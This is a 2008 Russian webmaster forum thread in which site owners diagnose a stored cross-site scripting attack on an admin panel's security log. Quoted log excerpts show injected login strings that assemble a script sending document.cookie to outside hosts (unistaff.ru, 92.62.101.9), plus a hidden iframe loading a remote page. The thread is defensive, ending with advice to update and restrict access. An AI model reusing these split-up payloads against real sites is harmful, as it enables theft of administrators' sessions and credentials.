Реклама на сайте Advertise with us

Гребаный ат3

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/05/08 в 20:09       Ответить с цитатойцитата 

может баян, но обнаружил у себя на странице секьюрити-логов скрипт шифрованый, короче понял так, что куки отправляет с паролем на unistaff(dot)ru/js/s.
скрипт ставится через юзер/пасс.
айпи 92.62.101.9

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 24/05/08 в 23:18       Ответить с цитатойцитата 

вероятнее всего в самом sec.log у тебя такая конструкция:
Код:

<td style="white-space: nowrap;">03:10 - 29 Mar</td><td style="white-space: nowrap;">system</td><td
style="white-space: nowrap;">195.5.116.250 tried to login with
';i=new Image();i.src=s;a=" / ";//--></scrip^@t>.</td></tr>
<tr class=row2><td style="white-space: nowrap;">03:11 - 29 Mar</td><td style="white-space: nowrap;">system</td><td
style="white-space: nowrap;">195.5.116.250 tried to login with
<scrip^@t>/*<!--*/s="http";a=" / ";s+="://unistaff.ru/js/s.";b='.</td></tr>
[/quote]


проверь плс дату, волна таких попыток закончилась как раз в марте-апреле.

и просто закрой всё хтаксесесом.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 24/05/08 в 23:40       Ответить с цитатойцитата 

20 мая было..
ифрейм как-то вставлен..
Код:
<iframe width=1 height=1 a=" / " b='.</td></tr><tr class=row2><td style="white-space: nowrap;">06:58 - 20 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with 'src=http://92.62.101.9/i.php> / </iframe>.</td></tr><tr class=row2><td style="white-space: nowrap;">06:58 - 20 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with <scrip t>/*<!--*/s="http";a=" / ";s+="://92.62.101.9/u/s.";b='.</td></tr><tr class=row2><td style="white-space: nowrap;">19:38 - 18 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with ';s+="php?";a=" / ";s+=document.cookie;b='.</td></tr><tr class=row2><td style="white-space: nowrap;">19:38 - 18 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with ';i=new Image();i.src=s;a=" / ";//--></scrip t>.</td></tr><tr class=row2><td style="white-space: nowrap;">19:38 - 18 May</td><td style="white-space: nowrap;">

это я из кода страницы вырезал.
sec.log почистил сразу, поэтому не могу сказать что там было..

хотя если в секьюритилог не заходить, нестрашно наверно icon_smile.gif

0
 



С нами с 25.09.04
Сообщения: 485
Рейтинг: 514

Ссылка на сообщениеДобавлено: 26/05/08 в 11:12       Ответить с цитатойцитата 

странно.. такие взломы были как писал Soft-Com месяц назад до 17 билда.

0
 

(.)(.) Сиськеее...

С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651

Ссылка на сообщениеДобавлено: 26/05/08 в 14:36       Ответить с цитатойцитата 

NeXt писал:
странно.. такие взломы были как писал Soft-Com месяц назад до 17 билда.

Что странного-то? Может ТС не обновлял билд... Или этот мудак нашел новую дырку...

0
 



С нами с 29.05.05
Сообщения: 671
Рейтинг: 293

Ссылка на сообщениеДобавлено: 26/05/08 в 16:04       Ответить с цитатойцитата 

угу, на этом сайте не обновил, так что сорри за ложную тревогу icon_smile.gif

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »